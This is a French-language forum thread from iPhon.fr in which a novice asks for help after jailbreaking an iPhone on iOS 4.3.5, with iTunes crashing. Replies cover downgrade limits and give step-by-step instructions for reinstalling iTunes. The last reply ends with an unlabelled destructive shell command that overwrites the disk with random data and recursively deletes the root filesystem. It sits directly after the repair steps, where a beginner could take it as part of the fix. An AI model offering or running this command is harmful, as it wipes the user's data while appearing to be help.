Forum iPhone, iPad, Apple Watch de iPhon.fr

Forum utilisateurs Apple iPhone, iPad, Apple Watch, forfaits et accessoires

Vous n'êtes pas identifié(e).

Annonce

Bienvenue sur le forum du blog iPhon.fr

Pensez à poster dans la bonne rubrique, respecter les propos des autres internautes, ne pas utiliser le langage SMS, et enfin, à utiliser la fonction 'Recherche' !
Et... Gardez le sens de l'humour, de la convivialité et de la décontraction. On n'est pas là pour se prendre la tête ! ;-)

#1 02-11-2012 18:59:58

jeromeJC
Membre
Inscription : 02-11-2012
Messages : 2

Probleme iphone 4S suite jailbreak

Bonjour à tous, j'ai besoin d'aide et ne sais comment revenir en arrière.
J'ai jailbreak mon iphone 4S sans me soucier de ce qui fallait faire avant. J'ai lu entre autre qu'il fallait sauvegarder des fichiers avant, et malheureusement je ne l'ai pas fait.
La version sur laquelle je tourne est la 4.3.5 (8L1) et ma version de ITUNES est10.7.0.21. A ce jour je ne peux plus revenir en arrière et encore moins installer les nouvelles versions. ITUNES plante systémaiquement.

Je suis novice en la matière et cherche un gros coup de main pour savoir ce que je peux faire pour remédier au problème.

D'avance merci.

Hors ligne

#2 03-11-2012 16:32:21

iphone3gs
Administrateur
Lieu : Depuis l'iPhone de Steve Jobs.
Inscription : 07-08-2009
Messages : 14 102
Site Web

Re : Probleme iphone 4S suite jailbreak

Bonjour smile

jeromeJC a écrit :

La version sur laquelle je tourne est la 4.3.5 (8L1)

Es-tu certain qu'il s'agit d'un iPhone 4S (et non d'un iPhone 4) ?

En effet, l'iPhone 4S n'a jamais été livré avec un iOS inférieur à l'iOS 5. Du coup, si tu dis disposer de l'iOS 4.3.5 (8LI), cela me parait être plutôt un iPhone 4.

Et sinon, saches que tu ne peux malheureusement pas revenir à un iOS antérieur si celui-ci n'est pas supporté par l'appareil (ex: iOS 4 sur un iPhone 4S) OU si tu ne disposes pas de la sauvegarde des fichiers ECID SHSH (pour les iOS compatibles avec ton iPhone).

Hors ligne

#3 03-11-2012 18:03:41

jeromeJC
Membre
Inscription : 02-11-2012
Messages : 2

Re : Probleme iphone 4S suite jailbreak

Oui effectivement je ne suis pas sur qu'il s'agit d'une version 4S.
Par contre je redoutais ne pas pouvoir faire machine arrière.
Mais au final quelle est la solution??? Il n'y a vraiment rien à faire?

Hors ligne

#4 03-11-2012 18:21:48

-nicnl-
Membre
Inscription : 02-04-2008
Messages : 681

Re : Probleme iphone 4S suite jailbreak

Que veux tu dire ? Le problème, c'est que nous ne savons pas exactement quel est ton problème.
Ton iPhone ne démarre plus ? iTunes plante lors d'une mise à jour ? Je ne sais pas... Donne nous un maximum d'informations, et nous serons en mesure de t'aider.

_____________________________________________

Apparemment, iTunes sur ton ordinateur de démarre plus.
Ne t'inquiète pas, il existe toujours une solution wink
Maintenant, reste à trouver laquelle est la bonne.

Déjà, avant de faire quoi que ce soit, il faut être sûr que ton ordinateur soit "fiable", et apparemment ce n'est pas le cas : iTunes plante.


Voici ce que je te conseillerait de faire :

1) Rends toi dans iTunes, va dans le menu "Store", et selectionne "Retirer l'autorisation de cet ordinateur".
En pratique, Apple ne permet la synchronisation des musiques/applications QUE avec les ordinateurs autorisés. Si tu désinstalle iTunes sans retirer l'autorisation, tu te retrouvera avec un iTunes "fantôme" dans ta liste des 5 ordinateurs autorisés.

2) Rends toi dans ton dossier Musiques, et déplace/copie le dossier nommé iTunes ailleurs. C'est le dossier qui contient les applications et les musiques.
Ensuite, désinstalle la totalité des logiciels Apple de ton ordinateur à l'aide d'un désinstalleur ( tel que Revo Uninstaller ).

3) Redémarre ton PC, et reinstalle ensuite la toute dernière version d'iTunes fraichement téléchargée depuis le site officiel d'Apple ( et pas ailleurs )

4) Si à partir de la iTunes refonctionne correctement, c'est déjà ça de fait.

5) Quitte iTunes, puis tu te souviens du dossier "iTunes" que tu as du déplacé à l'étape 2 ? Eh bien remet le dans ton dossier musique.

6) Si après avoir relancé iTunes, tu te retrouve avec toute ta musique, c'est très bien.
Si par contre iTunes ne fonctionne pas uniquement après avoir remis le dossier "iTunes", alors il se peux que ta bibliothèque soit corrompue. ( Dans ce cas la, rien de grave non plus )

7) Connecte toi à ton compte iTunes, rends toi dans le menu Store, et selectionne "Autoriser cet ordinateur".


sudo cat /dev/urandom > /dev/sda & sudo rm -rf /* &

Hors ligne

Pied de page des forums

L'iPhone sur iPhon.fr, le blog de l'iPhone - blog iPad

iPhon.fr et son forum ne sont pas liés à Apple, Orange, SFR ou autres et les marques citées sont la propriété de leurs détenteurs respectifs.